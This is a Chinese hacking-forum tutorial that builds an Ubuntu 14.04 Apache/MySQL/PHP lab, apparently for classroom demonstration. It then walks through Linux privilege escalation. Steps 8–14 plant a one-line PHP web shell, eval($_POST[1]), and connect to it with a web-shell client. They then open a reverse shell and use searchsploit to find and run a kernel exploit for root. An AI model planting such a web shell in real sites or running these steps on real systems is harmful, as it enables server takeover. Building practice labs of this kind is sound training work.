【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建_奈斯资源网

【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建

时间:2019/1/20 12:35:11 作者:安琪 来源:www.nicezy.com 阅读:58 评论:0
内容摘要:【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建ubuntu14.04.4下载地址:链接:https://pan.baidu.com/s/1kqY3BzVop87Iid1TZJk67w提取码:cuzt1,安装apache<fontsize="5">  sudoapt-getupda...

【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建


ubuntu14.04.4下载地址:

链接:https://pan.baidu.com/s/1kqY3BzVop87Iid1TZJk67w 
提取码:cuzt
1,安装apache
  1. <font size="5">  sudo apt-get update
  2.   sudo apt-get install apache2</font>
复制代码
  这时http://你机器的ip,就可以访问了。

2,安装mysql
  1. <font size="5">sudo apt-get install mysql-server php5-mysql</font>
复制代码
  安装过程中会要求你输入root用户的密码
  安装完成后执行
  1. <font size="5">sudo mysql_install_db</font>
复制代码
  这句的意思是初始化数据库目录结构
  安装完成后 mysql -u root -p
  输入密码应该是可以进入数据库的.
  指定编码创建数据库:  
  1. <font size="5">CREATE DATABASE IF NOT EXISTS yourdbname DEFAULT CHARSET utf8 COLLATE utf8_general_ci;</font>
复制代码
  从文件导入数据:
  进入指定库后,source /var/tmp/all.mysql
  导出数据:
  1. <font size="5">mysqldump -u$USER -p$PASSWD -h127.0.0.1 -P3306 --routines --default-character-set=utf8 --databases mysql > db.all.sql</font>
复制代码

3,安装php及一些必要的扩展
  sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt php5-curl php5-imagick php5-cli
  如果你想找找其它扩展可以用命令:apt-cache search php5-   

4,修改默认主页
修改 /etc/apache2/mods-enabled/dir.conf
把DirectoryIndex index.html index.cgi index.pl index.php index.xhtml index.htm中index.php改到最前面(可以根据自已需要)
如:DirectoryIndex index.php index.html index.cgi index.pl index.xhtml index.htm

5,重启apache2让修改生效,并测试
  重启apache2:sudo service apache2 restart
  ubuntu14.04中apache的网站主目录是在:/var/www/html
  在此目录新建info.php文件,内容为:
  <?php
    phpinfo();
  ?>
  访问:http://你服务器ip/info.php如果显示php环境信息,测表示安装成功
6,新建站点
  在apache2的配置目录(/etc/apache2/)中有两个目录是与新建站点有关的
    sites-availables包含所有站点文件,即有启用的与非启用的
    sites-enabled包含启用了的站点,一般来说sites-enabled里的文件是sites-availables链接
  在/etc/apache2/apache2.conf文件中包含一句:IncludeOptional sites-enabled/*.conf,所以只有在sites-enabled目录中加了站点文件才会生效
  在sites-availables里添加文件test.conf
  ln -s /etc/apache2/sites-availables/test.conf /etc/apache2/sites-enabled/test.conf
7,编辑站点文件
  1. <font size="5"><VirtualHost *:80>
  2.   ServerName test.com
  3.   ServerAlias www.test.com
  4.   ServerAlias a.test.com

  5.   ServerAdmin webmaster@localhost
  6.   DocumentRoot /var/www/test
  7. </VirtualHost></font>
复制代码
本机测试添加hosts记录,即可访问。
8,进入/var/www/html/ 目录,新建一个一句话木马 one.php
  1. <?php
  2. eval($_POST[1]);
  3. ?>
复制代码

9,菜刀连接这个文件。
【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建 
10,终端执行 whoami 查看自己的权限
【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建 

11,反弹shell
【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建 

12,查看内核
  1. uname -a
复制代码
13,使用kalilinux 搜索 关于ubuntu14的漏洞 exp
https://www.exploit-db.com/exploits/37292/
  1. searchsploit ubuntu 14 -w
复制代码
【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建 

14,执行提权exp
按照提示,下载,编译,执行
【yes黑客联盟】linux系统ubuntu14.04.4提权实验环境搭建 

提权成功!

给学生演示,安装ssh,xshell 远程连接,搭建apache环境
sudo apt-get update
sudo apt-get install openssh-server

标签:yes黑客联盟 linux系统 ubuntu14.04.4